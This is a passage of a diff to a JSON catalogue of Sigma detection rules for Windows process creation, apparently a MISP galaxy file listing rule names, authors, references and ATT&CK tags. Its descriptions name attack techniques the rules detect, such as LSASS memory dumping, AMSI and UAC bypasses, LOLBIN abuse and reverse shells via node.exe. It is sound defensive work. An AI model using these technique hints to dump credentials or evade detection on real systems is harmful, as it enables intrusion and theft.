"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", - "value": "Procdump Evasion" - }, - { - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "meta": { - "author": "Cedric MAURUGEON", - "creation_date": "2021/09/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_process_dump_rdrleakdiag.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml" + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" ], "tags": [ "attack.credential_access", "attack.t1003.001" ] }, - "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "value": "Process Dump via RdrLeakDiag.exe" + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns" + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "meta": { + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "filename": "proc_creation_win_susp_copy_system32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32" + }, + { + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" + ], + "tags": [ + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" + ] + }, + "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "value": "Writing Of Malicious Files To The Fonts Folder" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "value": "Invoke-Obfuscation Via Use MSHTA" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_logmein.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", + "value": "Use of LogMeIn Remote Access Software" + }, + { + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "meta": { + "author": "frack113", + "creation_date": "2021/07/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_winzip.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winzip.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", + "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" + }, + { + "description": "Marks a file as a system file using the attrib.exe utility", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_attrib_system.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", + "value": "Set Windows System File with Attrib" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_critical.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "value": "Turla Group Lateral Movement" + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution" + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin" + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", + "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" + }, + { + "description": "Detects audio capture via PowerShell Cmdlet.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate audio capture by legitimate user." + ], + "filename": "proc_creation_win_powershell_audio_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "value": "Audio Capture via PowerShell" + }, + { + "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_node_abuse.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://nodejs.org/api/cli.html", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse" + }, + { + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/09", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_ps_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData" + }, + { + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "value": "UAC Bypass Using ChangePK and SLUI" + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882" + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation" + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS" + }, + { + "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharp_ldap_monitor.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/p0dalirius/LDAPmonitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_ldap_monitor.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", + "value": "SharpLDAPmonitor Execution" + }, + { + "description": "Detects use of executionpolicy option to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/11/01", + "falsepositive": [ + "Administrator script" + ], + "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "value": "Change PowerShell Policies to an Insecure Level" + }, + { + "description": "This rule detects the execution of Run Once task as configured in the registry", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_runonce_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "value": "Run Once Task Execution as Configured in Registry" + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding" + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_electron_app_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/mttaggart/quasar", + "https://taggart-tech.com/quasar-electron/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes" + }, + { + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tor_browser.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "value": "Tor Client or Tor Browser Use" }, { "description": "Detects process memory dump via comsvcs.dll and rundll32 using different techniques (ordinal, minidump function...etc)", @@ -44936,4222 +42239,284 @@ "value": "Process Dump via Rundll32 and Comsvcs.dll" }, { - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/04", - "falsepositive": [ - "Command lines that use the same flags" - ], - "filename": "proc_creation_win_proc_dump_createdump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://twitter.com/bopin2020/status/1366400799199272960", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "value": "CreateDump Process Dump" - }, - { - "description": "Detects the use of a Visual Studio bundled tool named DumpMinitool.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proc_dump_dumpminitool.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", - "value": "DumpMinitool Usage" - }, - { - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "6355a919-2e97-4285-a673-74645566340d", - "value": "RdrLeakDiag Process Dump" - }, - { - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ] - }, - "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", - "value": "Suspicious DumpMinitool Usage" - }, - { - "description": "Detect suspicious parent processes of well-known Windows processes", - "meta": { - "author": "vburov", - "creation_date": "2019/02/23", - "falsepositive": [ - "Some security products seem to spawn these" - ], - "filename": "proc_creation_win_proc_wrong_parent.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://attack.mitre.org/techniques/T1036/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" - ] - }, - "uuid": "96036718-71cc-4027-a538-d1587e0006a7", - "value": "Windows Processes Suspicious Parent Directory" - }, - { - "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_protocolhandler_susp_file.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "value": "ProtocolHandler.exe Downloaded Suspicious File" - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_proxy_execution_wuauclt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://dtm.uk/wuauclt/", - "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ] - }, - "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", - "value": "Proxy Execution via Wuauclt" - }, - { - "description": "Detects a PsExec service start", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_psexesvc_start.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" - ], - "tags": [ - "attack.execution", - "attack.s0029", - "attack.t1569.002" - ] - }, - "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", - "value": "PsExec Service Start" - }, - { - "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", - "meta": { - "author": "@Kostastsale", - "creation_date": "2022/11/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ] - }, - "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", - "value": "PowerShell AMSI Bypass Pattern" - }, - { - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/30", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_pua_defendercheck.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/matterpreter/DefenderCheck", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.005" - ] - }, - "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "value": "DefenderCheck Usage" - }, - { - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_pua_seatbelt.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Seatbelt", - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" - ] - }, - "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", - "value": "Seatbelt PUA Tool" - }, - { - "description": "This rule detects suspicious processes with parent images located in 